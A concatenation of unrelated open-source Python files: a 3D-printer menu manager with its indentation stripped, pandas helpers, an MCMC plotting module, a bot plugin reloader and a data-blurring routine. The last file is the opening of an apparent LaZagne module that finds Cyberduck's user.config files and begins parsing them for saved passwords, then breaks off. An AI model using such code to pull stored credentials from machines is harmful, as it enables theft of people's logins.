if selected_row < self._viewport_top:
self._viewport_top = selected_row
else:
self._viewport_top = 0
# clamps viewport
self._viewport_top = max(0, min(self._viewport_top, len(self) - nrows))
try:
y = 0
for row in range(self._viewport_top, self._viewport_top + nrows):
text = ""
prefix = ""
suffix = ""
if row < len(self):
current = self[row]
selected = (row == selected_row)
if selected:
current.heartbeat(eventtime)
text = current.render_name(selected)
# add prefix (selection indicator)
if selected and not current.is_editing():
prefix = current.cursor
elif selected and current.is_editing():
prefix = '*'
else:
prefix = ' '
# add suffix (folder indicator)
if isinstance(current, MenuList):
suffix += '>'
# draw to display
plen = len(prefix)
slen = len(suffix)
width = self.manager.cols - plen - slen
# draw item prefix (cursor)
ppos = display.draw_text(y, 0, prefix, eventtime)
# draw item name
tpos = display.draw_text(y, ppos, text.ljust(width), eventtime)
# check scroller
if (selected and tpos > self.manager.cols
and current.is_scrollable()):
# scroll next
current.need_scroller(True)
else:
# reset scroller
current.need_scroller(None)
# draw item suffix
if suffix:
display.draw_text(
y, self.manager.cols - slen, suffix, eventtime)
# next display row
y += 1
except Exception:
logging.exception('List drawing error')
class MenuVSDList(MenuList):
def __init__(self, manager, config, **kwargs):
super(MenuVSDList, self).__init__(manager, config, **kwargs)
def _populate(self):
super(MenuVSDList, self)._populate()
sdcard = self.manager.printer.lookup_object('virtual_sdcard', None)
if sdcard is not None:
files = sdcard.get_file_list()
for fname, fsize in files:
self.insert_item(self.manager.menuitem_from(
'command', name=repr(fname), gcode='M23 /%s' % str(fname)))
menu_items = {
'disabled': MenuDisabled,
'command': MenuCommand,
'input': MenuInput,
'list': MenuList,
'vsdlist': MenuVSDList
}
TIMER_DELAY = 1.0
class MenuManager:
def __init__(self, config, display):
self.running = False
self.menuitems = {}
self.menustack = []
self.children = {}
self.display = display
self.printer = config.get_printer()
self.pconfig = self.printer.lookup_object('configfile')
self.gcode = self.printer.lookup_object('gcode')
self.gcode_queue = []
self.context = {}
self.root = None
self._root = config.get('menu_root', '__main')
self.cols, self.rows = self.display.get_dimensions()
self.timeout = config.getint('menu_timeout', 0)
self.timer = 0
# reverse container navigation
self._reverse_navigation = config.getboolean(
'menu_reverse_navigation', False)
# load printer objects
self.gcode_macro = self.printer.load_object(config, 'gcode_macro')
# register itself for printer callbacks
self.printer.add_object('menu', self)
self.printer.register_event_handler("klippy:ready", self.handle_ready)
# register for key events
menu_keys.MenuKeys(config, self.key_event)
# Load local config file in same directory as current module
self.load_config(os.path.dirname(__file__), 'menu.cfg')
# Load items from main config
self.load_menuitems(config)
# Load menu root
self.root = self.lookup_menuitem(self._root)
# send init event
self.send_event('init', self)
def handle_ready(self):
# start timer
reactor = self.printer.get_reactor()
reactor.register_timer(self.timer_event, reactor.NOW)
def timer_event(self, eventtime):
self.timeout_check(eventtime)
return eventtime + TIMER_DELAY
def timeout_check(self, eventtime):
if (self.is_running() and self.timeout > 0
and isinstance(self.root, MenuContainer)):
if self.timer >= self.timeout:
self.exit()
else:
self.timer += 1
else:
self.timer = 0
def send_event(self, event, *args):
return self.printer.send_event("menu:" + str(event), *args)
def is_running(self):
return self.running
def begin(self, eventtime):
self.menustack = []
self.timer = 0
if isinstance(self.root, MenuContainer):
# send begin event
self.send_event('begin', self)
self.update_context(eventtime)
if isinstance(self.root, MenuContainer):
self.root.init_selection()
self.stack_push(self.root)
self.running = True
return
elif self.root is not None:
logging.error("Invalid root, menu stopped!")
self.running = False
def get_status(self, eventtime):
return {
'timeout': self.timeout,
'running': self.running,
'rows': self.rows,
'cols': self.cols
}
def _action_back(self, force=False, update=True):
self.back(force, update)
return ""
def _action_exit(self, force=False):
self.exit(force)
return ""
def get_context(self, cxt=None):
context = dict(self.context)
if isinstance(cxt, dict):
context.update(cxt)
return context
def update_context(self, eventtime):
# menu default jinja2 context
self.context = self.gcode_macro.create_template_context(eventtime)
self.context['menu'] = {
'eventtime': eventtime,
'back': self._action_back,
'exit': self._action_exit
}
def stack_push(self, container):
if not isinstance(container, MenuContainer):
raise error("Wrong type, expected MenuContainer")
container.populate()
top = self.stack_peek()
if top is not None:
if isinstance(top, MenuList):
top.run_script('leave')
if isinstance(container, MenuList):
container.run_script('enter')
if not container.is_editing():
container.update_items()
container.init_selection()
self.menustack.append(container)
def stack_pop(self, update=True):
container = None
if self.stack_size() > 0:
container = self.menustack.pop()
if not isinstance(container, MenuContainer):
raise error("Wrong type, expected MenuContainer")
top = self.stack_peek()
if top is not None:
if not isinstance(container, MenuContainer):
raise error("Wrong type, expected MenuContainer")
if not top.is_editing() and update is True:
top.update_items()
top.init_selection()
if isinstance(container, MenuList):
container.run_script('leave')
if isinstance(top, MenuList):
top.run_script('enter')
else:
if isinstance(container, MenuList):
container.run_script('leave')
return container
def stack_size(self):
return len(self.menustack)
def stack_peek(self, lvl=0):
container = None
if self.stack_size() > lvl:
container = self.menustack[self.stack_size() - lvl - 1]
return container
def screen_update_event(self, eventtime):
# screen update
if not self.is_running():
return False
# draw menu
self.update_context(eventtime)
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
container.heartbeat(eventtime)
container.draw_container(self.rows, eventtime)
return True
def up(self, fast_rate=False):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if isinstance(current, MenuInput) and current.is_editing():
current.dec_value(fast_rate)
else:
if self._reverse_navigation is True:
container.select_next() # reverse
else:
container.select_prev() # normal
def down(self, fast_rate=False):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if isinstance(current, MenuInput) and current.is_editing():
current.inc_value(fast_rate)
else:
if self._reverse_navigation is True:
container.select_prev() # reverse
else:
container.select_next() # normal
def back(self, force=False, update=True):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if isinstance(current, MenuInput) and current.is_editing():
if force is True:
current.stop_editing()
else:
return
parent = self.stack_peek(1)
if isinstance(parent, MenuContainer):
self.stack_pop(update)
index = parent.index_of(container, True)
if index is not None:
parent.select_at(index)
elif parent.selected_item() is None:
parent.init_selection()
else:
self.stack_pop()
self.running = False
def exit(self, force=False):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if (not force and isinstance(current, MenuInput)
and current.is_editing()):
return
if isinstance(container, MenuList):
container.run_script('leave')
self.send_event('exit', self)
self.running = False
def push_container(self, menu):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
if (isinstance(menu, MenuContainer)
and not container.is_editing()
and menu is not container):
self.stack_push(menu)
return True
return False
def press(self, event='click'):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if isinstance(current, MenuContainer):
self.stack_push(current)
elif isinstance(current, MenuInput):
if current.is_editing():
current.run_script('gcode', event=event)
current.run_script(event)
elif isinstance(current, MenuCommand):
current.run_script('gcode', event=event)
current.run_script(event)
else:
# current is None, no selection. passthru to container
container.run_script(event)
def queue_gcode(self, script):
if not script:
return
if not self.gcode_queue:
reactor = self.printer.get_reactor()
reactor.register_callback(self.dispatch_gcode)
self.gcode_queue.append(script)
def dispatch_gcode(self, eventtime):
while self.gcode_queue:
script = self.gcode_queue[0]
try:
self.gcode.run_script(script)
except Exception:
logging.exception("Script running error")
self.gcode_queue.pop(0)
def menuitem_from(self, type, **kwargs):
if type not in menu_items:
raise error("Choice '%s' for option '%s'"
" is not a valid choice" % (type, menu_items))
return menu_items[type](self, None, **kwargs)
def add_menuitem(self, name, item):
existing_item = False
if name in self.menuitems:
existing_item = True
logging.info(
"Declaration of '%s' hides "
"previous menuitem declaration" % (name,))
self.menuitems[name] = item
if isinstance(item, MenuElement):
parent = item.get_ns('..')
if parent and not existing_item:
if item.index is not None:
self.children.setdefault(parent, []).insert(
item.index, item.get_ns())
else:
self.children.setdefault(parent, []).append(
item.get_ns())
def lookup_menuitem(self, name, default=sentinel):
if name is None:
return None
if name in self.menuitems:
return self.menuitems[name]
if default is sentinel:
raise self.printer.config_error(
"Unknown menuitem '%s'" % (name,))
return default
def lookup_children(self, ns):
if ns in self.children:
return list(self.children[ns])
return list()
def load_config(self, *args):
cfg = None
filename = os.path.join(*args)
try:
cfg = self.pconfig.read_config(filename)
except Exception:
raise self.printer.config_error(
"Cannot load config '%s'" % (filename,))
if cfg:
self.load_menuitems(cfg)
return cfg
def load_menuitems(self, config):
for cfg in config.get_prefix_sections('menu '):
type = cfg.get('type')
if type not in menu_items:
raise error("Choice '%s' for option '%s'"
" is not a valid choice" % (type, menu_items))
item = menu_items[type](self, cfg)
self.add_menuitem(item.get_ns(), item)
def _click_callback(self, eventtime, event):
if self.is_running():
self.press(event)
else:
# lets start and populate the menu items
self.begin(eventtime)
def key_event(self, key, eventtime):
if key == 'click':
self._click_callback(eventtime, key)
elif key == 'long_click':
self._click_callback(eventtime, key)
elif key == 'up':
self.up(False)
elif key == 'fast_up':
self.up(True)
elif key == 'down':
self.down(False)
elif key == 'fast_down':
self.down(True)
elif key == 'back':
self.back()
self.display.request_redraw()
# Collection of manager class helper methods
@classmethod
    def stripliterals(cls, s):
        """Strip surrounding double or single quotes from string literals."""
s = str(s)
if (s.startswith('"') and s.endswith('"')) or \
(s.startswith("'") and s.endswith("'")):
s = s[1:-1]
return s
@classmethod
def aslatin(cls, s):
if isinstance(s, str):
return s
elif isinstance(s, unicode):
return unicode(s).encode('latin-1', 'ignore')
else:
return str(s)
@classmethod
def asflat(cls, s):
return cls.stripliterals(''.join(cls.aslatin(s).splitlines()))
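# Illustrative sketch (not part of the original module): the two string
# helpers above are plain classmethods, so they can be exercised without a
# configured printer or display.  The demo function name is hypothetical.
def _demo_string_helpers():
    assert MenuManager.stripliterals('"Home XY"') == 'Home XY'
    assert MenuManager.stripliterals("'Home Z'") == 'Home Z'
    assert MenuManager.stripliterals('plain') == 'plain'
    # asflat() joins multi-line strings before stripping the quotes
    assert MenuManager.asflat('"multi\nline"') == 'multiline'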
| gpl-3.0 | -7,977,170,827,967,675,000 | 33.092784 | 79 | 0.546114 | false |
nelango/ViralityAnalysis | model/lib/pandas/tools/util.py | 9 | 2780 | import numpy as np
import pandas.lib as lib
import pandas as pd
from pandas.compat import reduce
from pandas.core.index import Index
from pandas.core import common as com
def match(needles, haystack):
haystack = Index(haystack)
needles = Index(needles)
return haystack.get_indexer(needles)
def cartesian_product(X):
'''
Numpy version of itertools.product or pandas.compat.product.
Sometimes faster (for large inputs)...
Examples
--------
>>> cartesian_product([list('ABC'), [1, 2]])
[array(['A', 'A', 'B', 'B', 'C', 'C'], dtype='|S1'),
array([1, 2, 1, 2, 1, 2])]
'''
lenX = np.fromiter((len(x) for x in X), dtype=int)
cumprodX = np.cumproduct(lenX)
a = np.roll(cumprodX, 1)
a[0] = 1
b = cumprodX[-1] / cumprodX
return [np.tile(np.repeat(np.asarray(com._values_from_object(x)), b[i]),
np.product(a[i]))
for i, x in enumerate(X)]
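# Hedged example (not in the original module): cartesian_product() expands
# several 1-d sequences into aligned arrays, like a vectorised
# itertools.product.  The demo function name is hypothetical.
def _demo_cartesian_product():
    letters, numbers = cartesian_product([list('AB'), [1, 2, 3]])
    # letters -> A A A B B B ; numbers -> 1 2 3 1 2 3
    return list(zip(letters, numbers))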
def _compose2(f, g):
"""Compose 2 callables"""
return lambda *args, **kwargs: f(g(*args, **kwargs))
def compose(*funcs):
"""Compose 2 or more callables"""
assert len(funcs) > 1, 'At least 2 callables must be passed to compose'
return reduce(_compose2, funcs)
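# Hedged example (not in the original module): compose() chains callables
# right-to-left, i.e. compose(f, g)(x) == f(g(x)).  Demo name is hypothetical.
def _demo_compose():
    add_one = lambda v: v + 1
    double = lambda v: v * 2
    assert compose(add_one, double)(10) == 21   # double first, then add_one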
def to_numeric(arg, errors='raise'):
"""
Convert argument to a numeric type.
Parameters
----------
arg : list, tuple or array of objects, or Series
errors : {'ignore', 'raise', 'coerce'}, default 'raise'
- If 'raise', then invalid parsing will raise an exception
- If 'coerce', then invalid parsing will be set as NaN
- If 'ignore', then invalid parsing will return the input
Returns
-------
ret : numeric if parsing succeeded.
Return type depends on input. Series if Series, otherwise ndarray
Examples
--------
Take separate series and convert to numeric, coercing when told to
>>> import pandas as pd
>>> s = pd.Series(['1.0', '2', -3])
>>> pd.to_numeric(s)
>>> s = pd.Series(['apple', '1.0', '2', -3])
>>> pd.to_numeric(s, errors='ignore')
>>> pd.to_numeric(s, errors='coerce')
"""
index = name = None
if isinstance(arg, pd.Series):
index, name = arg.index, arg.name
elif isinstance(arg, (list, tuple)):
arg = np.array(arg, dtype='O')
conv = arg
arg = com._ensure_object(arg)
coerce_numeric = False if errors in ('ignore', 'raise') else True
try:
conv = lib.maybe_convert_numeric(arg,
set(),
coerce_numeric=coerce_numeric)
except:
if errors == 'raise':
raise
if index is not None:
return pd.Series(conv, index=index, name=name)
else:
return conv
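# Hedged usage sketch (not in the original module), mirroring the docstring
# examples of to_numeric() above; assumes a working pandas installation.
def _demo_to_numeric():
    s = pd.Series(['1.0', '2', -3])
    print(to_numeric(s))                    # 1.0, 2.0, -3.0
    s = pd.Series(['apple', '1.0', '2', -3])
    print(to_numeric(s, errors='ignore'))   # input returned unchanged
    print(to_numeric(s, errors='coerce'))   # 'apple' becomes NaN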
| mit | 7,139,247,261,411,718,000 | 25.730769 | 76 | 0.576978 | false |
jspilker/visilens | visilens/triangleplot.py | 1 | 8939 | import matplotlib.pyplot as pl; pl.ioff()
import matplotlib.cm as cm
from matplotlib.ticker import MaxNLocator
import scipy.ndimage
import numpy as np
import re
import copy
__all__ = ['TrianglePlot_MCMC','marginalize_2d','marginalize_1d']
def TrianglePlot_MCMC(mcmcresult,plotmag=True,plotnuisance=False):
"""
Script to plot the usual triangle degeneracies.
Inputs:
mcmcresult:
The result of running the LensModelMCMC routine. We
can figure out everything we need from there.
plotmag:
Whether to show the dependence of magnification on the other
parameters (it's derived, not a fit param).
plotnuisance:
Whether to additionally plot various nuisance parameters, like
the absolute location of the lens or dataset amp scalings or
phase shifts.
Returns:
f,axarr:
A matplotlib.pyplot Figure object and array of Axes objects, which
can then be manipulated elsewhere. The goal is to send something
that looks pretty good, but this is useful for fine-tuning.
"""
# List of params we'll call "nuisance"
nuisance = ['xL','yL','ampscale_dset','astromshift_x_dset','astromshift_y_dset']
allcols = list(mcmcresult['chains'].dtype.names)
# Gets rid of mag for unlensed sources, which is always 1.
allcols = [col for col in allcols if not ('mu' in col and np.allclose(mcmcresult['chains'][col],1.))]
if not plotmag: allcols = [x for x in allcols if not 'mu' in x]
if not plotnuisance: allcols = [x for x in allcols if not any([l in x for l in nuisance])]
labelmap = {'xL':'$x_{L}$, arcsec','yL':'$y_{L}$, arcsec','ML':'$M_{L}$, $10^{11} M_\odot$',\
'eL':'$e_{L}$','PAL':'$\\theta_{L}$, deg CCW from E','xoffS':'$\Delta x_{S}$, arcsec','yoffS':'$\Delta y_{S}$, arcsec',\
'fluxS':'$F_{S}$, mJy','widthS':'$\sigma_{S}$, arcsec','majaxS':'$a_{S}$, arcsec',\
'indexS':'$n_{S}$','axisratioS':'$b_{S}/a_{S}$','PAS':'$\phi_{S}$, deg CCW from E',\
'shear':'$\gamma$','shearangle':'$\\theta_\gamma$',
'mu':'$\mu_{}$','ampscale_dset':'$A_{}$',
'astromshift_x_dset':'$\delta x_{}$, arcsec','astromshift_y_dset':'$\delta y_{}$, arcsec'}
f,axarr = pl.subplots(len(allcols),len(allcols),figsize=(len(allcols)*3,len(allcols)*3))
axarr[0,-1].text(-0.8,0.9,'Chain parameters:',fontsize='xx-large',transform=axarr[0,-1].transAxes)
it = 0.
for row,yax in enumerate(allcols):
for col,xax in enumerate(allcols):
x,y = copy.deepcopy(mcmcresult['chains'][xax]), copy.deepcopy(mcmcresult['chains'][yax])
if 'ML' in xax: x /= 1e11 # to 1e11Msun from Msun
if 'ML' in yax: y /= 1e11
if 'fluxS' in xax: x *= 1e3 # to mJy from Jy
if 'fluxS' in yax: y *= 1e3
# Figure out the axis labels...
if xax[-1].isdigit():
digit = re.search(r'\d+$',xax).group()
xlab = (digit+'}$').join(labelmap[xax[:-len(digit)]].split('}$'))
else: xlab = labelmap[xax]
if yax[-1].isdigit():
digit = re.search(r'\d+$',yax).group()
ylab = (digit+'}$').join(labelmap[yax[:-len(digit)]].split('}$'))
else: ylab = labelmap[yax]
# To counter outlying walkers stuck in regions of low likelihood, we use percentiles
# instead of std().
xstd = np.ediff1d(np.percentile(x,[15.87,84.13]))[0]/2.
ystd = np.ediff1d(np.percentile(y,[15.87,84.13]))[0]/2.
xmin,xmax = np.median(x)-8*xstd, np.median(x)+8*xstd
ymin,ymax = np.median(y)-8*ystd, np.median(y)+8*ystd
if row > col:
try: marginalize_2d(x,y,axarr[row,col],\
extent=[xmin,xmax,ymin,ymax],bins=int(max(np.floor(x.size/1000),50)))
except ValueError: print(xax,yax); raise ValueError("One of the columns has no dynamic range.")
if col > 0: pl.setp(axarr[row,col].get_yticklabels(),visible=False)
else: axarr[row,col].set_ylabel(ylab,fontsize='x-large')
if row<len(allcols)-1: pl.setp(axarr[row,col].get_xticklabels(),visible=False)
else: axarr[row,col].set_xlabel(xlab,fontsize='x-large')
axarr[row,col].xaxis.set_major_locator(MaxNLocator(5))
axarr[row,col].yaxis.set_major_locator(MaxNLocator(5))
elif row == col:
marginalize_1d(x,axarr[row,col],extent=[xmin,xmax],\
bins=int(max(np.floor(x.size/1000),50)))
if row<len(allcols)-1: axarr[row,col].set_xlabel(xlab,fontsize='x-large')
if col<len(allcols)-1: pl.setp(axarr[row,col].get_xticklabels(),visible=False)
axarr[row,col].xaxis.set_major_locator(MaxNLocator(5))
#axarr[row,col].yaxis.set_major_locator(MaxNLocator(5))
else:
if not (row==0 and col==len(allcols)): axarr[row,col].set_axis_off()
axarr[0,-1].text(-0.8,0.7-it,'{0:10s} = {1:.3f} $\pm$ {2:.3f}'.format(ylab,np.median(y),ystd),\
fontsize='xx-large',transform=axarr[0,-1].transAxes)
it += 0.2
axarr[0,-1].text(-0.8,0.7-it,'DIC = {0:.0f}'.format(mcmcresult['best-fit']['DIC']),fontsize='xx-large',\
transform=axarr[0,-1].transAxes)
f.subplots_adjust(hspace=0,wspace=0)
return f,axarr
def marginalize_2d(x,y,axobj,*args,**kwargs):
"""
Routine to plot 2D confidence intervals between two parameters given arrays
of MCMC samples.
Inputs:
x,y:
Arrays of MCMC chain values.
axobj:
A matplotlib Axes object on which to plot.
extent:
List of [xmin,xmax,ymin,ymax] values to be used as plot axis limits
bins:
Number of bins to put the chains into.
levs:
Contour levels, in sigma.
"""
# Get values of various possible kwargs
bins = int(kwargs.pop('bins',50))
levs = kwargs.pop('levs',[1.,2.,3.])
extent = kwargs.pop('extent',[x.min(),x.max(),y.min(),y.max()])
cmap = kwargs.pop('cmap','Greys')
cmap = cm.get_cmap(cmap.capitalize())
cmap = cmap(np.linspace(0,1,np.asarray(levs).size))
#cmap._init()
#cmap._lut[:-3,:-1] = 0.
#cmap._lut[:-3,-1] = np.linspace(1,0,cmap.N)
#colorlevs = ([200./256]*3,[80./256]*3,[12./256]*3)
Xbins = np.linspace(extent[0],extent[1],bins+1)
Ybins = np.linspace(extent[2],extent[3],bins+1)
# Bin up the samples. Will fail if x or y has no dynamic range
try:
H,X,Y = np.histogram2d(x.flatten(),y.flatten(),bins=(Xbins,Ybins))
    except ValueError: raise ValueError("One of your columns has no dynamic range... check it.")
# Generate contour levels, sort probabilities from most to least likely
V = 1.0 - np.exp(-0.5*np.asarray(levs)**2.)
H = scipy.ndimage.filters.gaussian_filter(H,np.log10(x.size))
Hflat = H.flatten()
inds = np.argsort(Hflat)[::-1]
Hflat = Hflat[inds]
sm = np.cumsum(Hflat)
sm /= sm[-1]
# Find the probability levels that encompass each sigma's worth of likelihood
for i,v0 in enumerate(V):
try: V[i] = Hflat[sm <= v0][-1]
except: V[i] = Hflat[0]
V = V[::-1]
clevs = np.append(V,Hflat.max())
X1, Y1 = 0.5*(X[1:] + X[:-1]), 0.5*(Y[1:]+Y[:-1])
if kwargs.get('plotfilled',True): axobj.contourf(X1,Y1,H.T,clevs,colors=cmap)
axobj.contour(X1,Y1,H.T,clevs,colors=kwargs.get('colors','k'),linewidths=kwargs.get('linewidths',1.5),\
linestyles=kwargs.get('linestyles','solid'))
axobj.set_xlim(extent[0],extent[1])
axobj.set_ylim(extent[2],extent[3])
def marginalize_1d(x,axobj,*args,**kwargs):
"""
Plot a histogram of x, with a few tweaks for corner plot pleasantry.
Inputs:
x:
Array of MCMC samples to plot up.
axobj:
Axes object on which to plot.
"""
bins = int(kwargs.pop('bins',50))
extent = kwargs.pop('extent',[x.min(),x.max()])
fillcolor = kwargs.pop('color','gray')
#X = scipy.ndimage.filters.gaussian_filter(x,np.log10(x.size))
axobj.hist(x,bins=bins,range=extent,histtype='stepfilled',color=fillcolor)
axobj.yaxis.tick_right()
pl.setp(axobj.get_yticklabels(),visible=False)
axobj.set_xlim(extent[0],extent[1])
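# Hedged example (not part of the original module): exercising both
# marginalization helpers on synthetic, correlated "chains".  Sample sizes,
# seed and the output filename are arbitrary illustrative choices.
def _demo_marginalize():
    np.random.seed(0)
    x = np.random.normal(0., 1., 20000)
    y = 0.6 * x + np.random.normal(0., 0.8, 20000)
    f, (ax1, ax2) = pl.subplots(1, 2, figsize=(8, 4))
    marginalize_1d(x, ax1, extent=[x.min(), x.max()])
    marginalize_2d(x, y, ax2, extent=[x.min(), x.max(), y.min(), y.max()])
    f.savefig('demo_marginalize.png')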
| mit | 3,057,328,484,673,881,600 | 43.695 | 132 | 0.553194 | false |
TeamPeggle/ppp-helpdesk | core/reload.py | 2 | 5214 | from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
import collections
import glob
import os
import re
import sys
import traceback
if 'mtimes' not in globals():
mtimes = {}
if 'lastfiles' not in globals():
lastfiles = set()
def make_signature(f):
return f.__code__.co_filename, f.__name__, f.__code__.co_firstlineno
def format_plug(plug, kind='', lpad=0, width=40):
out = ' ' * lpad + '%s:%s:%s' % make_signature(plug[0])
if kind == 'command':
out += ' ' * (50 - len(out)) + plug[1]['name']
if kind == 'event':
out += ' ' * (50 - len(out)) + ', '.join(plug[1]['events'])
if kind == 'regex':
out += ' ' * (50 - len(out)) + plug[1]['regex']
return out
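# Illustrative sketch (not in the original module): make_signature() and
# format_plug() only inspect a function's code object, so they can be tried
# on any plain function.  The names below are hypothetical.
def _demo_format_plug():
    def fake_hook(inp):
        return inp
    plug = (fake_hook, {'name': 'fake'})
    print(make_signature(fake_hook))          # (filename, 'fake_hook', lineno)
    print(format_plug(plug, kind='command'))  # padded listing line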
def reload(init=False):
changed = False
if init:
bot.plugs = collections.defaultdict(list)
bot.threads = {}
core_fileset = set(glob.glob(os.path.join("core", "*.py")))
for filename in core_fileset:
mtime = os.stat(filename).st_mtime
if mtime != mtimes.get(filename):
mtimes[filename] = mtime
changed = True
try:
eval(compile(open(filename, 'r').read(), filename, 'exec'),
globals())
except Exception:
traceback.print_exc()
if init: # stop if there's an error (syntax?) in a core
sys.exit() # script on startup
continue
if filename == os.path.join('core', 'reload.py'):
reload(init=init)
return
fileset = set(glob.glob(os.path.join('plugins', '*.py')))
# remove deleted/moved plugins
for name, data in bot.plugs.items():
bot.plugs[name] = [x for x in data if x[0]._filename in fileset]
for filename in list(mtimes):
if filename not in fileset and filename not in core_fileset:
mtimes.pop(filename)
for func, handler in list(bot.threads.items()):
if func._filename not in fileset:
handler.stop()
del bot.threads[func]
# compile new plugins
for filename in fileset:
mtime = os.stat(filename).st_mtime
if mtime != mtimes.get(filename):
mtimes[filename] = mtime
changed = True
try:
code = compile(open(filename, 'r').read(), filename, 'exec')
namespace = {}
eval(code, namespace)
except Exception:
traceback.print_exc()
continue
# remove plugins already loaded from this filename
for name, data in bot.plugs.items():
bot.plugs[name] = [x for x in data
if x[0]._filename != filename]
for func, handler in list(bot.threads.items()):
if func._filename == filename:
handler.stop()
del bot.threads[func]
for obj in namespace.values():
if hasattr(obj, '_hook'): # check for magic
if obj._thread:
bot.threads[obj] = Handler(obj)
for type, data in obj._hook:
bot.plugs[type] += [data]
if not init:
print('### new plugin (type: %s) loaded:' % \
type, format_plug(data))
if changed:
bot.commands = {}
for plug in bot.plugs['command']:
name = plug[1]['name'].lower()
if not re.match(r'^\w+$', name):
print('### ERROR: invalid command name "%s" (%s)' % (name,
format_plug(plug)))
continue
if name in bot.commands:
print("### ERROR: command '%s' already registered (%s, %s)" % \
(name, format_plug(bot.commands[name]),
format_plug(plug)))
continue
bot.commands[name] = plug
bot.events = collections.defaultdict(list)
for func, args in bot.plugs['event']:
for event in args['events']:
bot.events[event].append((func, args))
if init:
print(' plugin listing:')
if bot.commands:
# hack to make commands with multiple aliases
# print nicely
print(' command:')
commands = collections.defaultdict(list)
for name, (func, args) in bot.commands.items():
commands[make_signature(func)].append(name)
for sig, names in sorted(commands.items()):
names.sort(key=lambda x: (-len(x), x)) # long names first
out = ' ' * 6 + '%s:%s:%s' % sig
out += ' ' * (50 - len(out)) + ', '.join(names)
print(out)
for kind, plugs in sorted(bot.plugs.items()):
if kind == 'command':
continue
print(' %s:' % kind)
for plug in plugs:
print(format_plug(plug, kind=kind, lpad=6))
print()
| unlicense | 5,963,575,439,260,024,000 | 30.6 | 88 | 0.493479 | false |
kjohnsson/modality | modality/util/frequency_polygon_blurring.py | 1 | 2765 | from __future__ import unicode_literals
import numpy as np
def sample_linear_density(nsamp, x0, w, y0, y1):
'''
Input:
nsamp - number of samples
x0 - left boundary
w - interval length
y0 - density at left boundary
y1 - density at right boundary
'''
m = y0
k = y1-y0
u = np.random.rand(nsamp)
if k != 0:
q = m/k
return (-q + np.sign(q)*np.sqrt(q**2+(1+2*q)*u))*w + x0
return u*w + x0
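# Hedged check (not part of the original module): sampling from a density that
# rises linearly from y0=1 to y1=3 on [0, 1).  The normalized density is
# (1 + 2*x) / 2, whose mean is 7/12 ~ 0.583.  Demo name is hypothetical.
def _demo_sample_linear_density():
    np.random.seed(1)
    samples = sample_linear_density(100000, x0=0.0, w=1.0, y0=1.0, y1=3.0)
    print(samples.mean())  # expected to be close to 0.583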
def evenly_spaced_linear_density(nsamp, x0, w, y0, y1):
'''
Input:
nsamp - number of samples
x0 - left boundary
w - interval length
y0 - density at left boundary
y1 - density at right boundary
'''
m = y0
k = y1-y0
u = np.linspace(0, 1, nsamp, endpoint=False)
if k != 0:
q = m/k
return (-q + np.sign(q)*np.sqrt(q**2+(1+2*q)*u))*w + x0
return u*w + x0
def fp_blurring(data, w, even_spaced=False):
'''
Blurs data using the frequency polygon. Data is assumed to
    be binned with bin width w. The purpose of blurring is to counter the
    effect of truncation. When even_spaced is True, the blurred data is
    placed deterministically according to the density; when False it is
    sampled from the density.
Ref: Minnotte (1997): Nonparametric Testing of Existence of Modes.
Input:
data - data set (one-dimensional)
w - bin width
'''
y, x = np.histogram(data, bins=np.arange(min(data)-0.5*w, max(data)+1.5*w, w))
y_count = np.hstack([[0], y, [0]])
x_fp = np.zeros(2*len(x)-1)
x_fp[0::2] = x
x_fp[1::2] = (x[1:]+x[:-1])/2
y_fp = np.zeros(2*len(x)-1)
y_fp[1::2] = y
y_fp[::2] = (y_count[1:]+y_count[:-1])*1./2
n_fp = np.zeros(2*len(y), dtype=np.int)
p_left = (y_count[:-2] + 3*y_count[1:-1])*1./(y_count[:-2] + 6*y_count[1:-1] + y_count[2:])
p_left[np.isnan(p_left)] = 0
if not even_spaced:
n_fp[0::2] = np.random.binomial(y, p_left)
else:
n_fp[0::2] = np.round(y*p_left)
n_fp[1::2] = y - n_fp[0::2]
data_fp = []
for n, x0, y0, y1 in zip(n_fp, x_fp[:-1], y_fp[:-1], y_fp[1:]):
if not even_spaced:
data_fp.append(sample_linear_density(n, x0, w*0.5, y0, y1))
else:
data_fp.append(evenly_spaced_linear_density(n, x0, w*0.5, y0, y1))
data_blurred = data.copy().astype(np.float)
for i, (x0, x1) in enumerate(zip(x[:-1], x[1:])):
ind = (data >= x0)*(data < x1)
if len(ind) > 0:
data_blurred[ind] = np.hstack(data_fp[(2*i):(2*i+2)])
return data_blurred
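# Hedged usage sketch (not part of the original module): blurring truncated
# integer data with bin width 1.  Every blurred value should stay within half
# a bin width of the bin it came from.
def _demo_fp_blurring():
    np.random.seed(2)
    data = np.random.poisson(5, size=1000)
    blurred = fp_blurring(data, w=1.0, even_spaced=True)
    print(np.max(np.abs(blurred - data)))  # should not exceed ~0.5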
| mit | -5,759,943,636,172,562,000 | 31.529412 | 95 | 0.510307 | false |
Endika/LaZagne | Windows/src/LaZagne/softwares/sysadmin/cyberduck.py | 11 | 2264 | import sqlite3
import win32crypt
import sys, os, platform, base64
import xml.etree.cElementTree as ET
from config.write_output import print_output, print_debug
from config.constant import *
from config.header import Header
from config.moduleInfo import ModuleInfo
class Cyberduck(ModuleInfo):
def __init__(self):
options = {'command': '-c', 'action': 'store_true', 'dest': 'cyberduck', 'help': 'cyberduck'}
ModuleInfo.__init__(self, 'cyberduck', 'sysadmin', options)
# find the user.config file containing passwords
def get_path(self):
if 'APPDATA' in os.environ:
directory = os.environ['APPDATA'] + '\Cyberduck'
if os.path.exists(directory):
for dir in os.listdir(directory):
if dir.startswith('Cyberduck'):
for d in os.listdir(directory + os.sep + dir):
path = directory + os.sep + dir + os.sep + d + os.sep + 'user.config'
if os.path.exists(path):
return path
return 'User_profil_not_found'
else:
return 'CYBERDUCK_NOT_EXISTS'
else:
return 'APPDATA_NOT_FOUND'
# parse the xml file
def parse_xml(self, xml_file):
tree = ET.ElementTree(file=xml_file)
pwdFound = []
for elem in tree.iter():
values = {}
try:
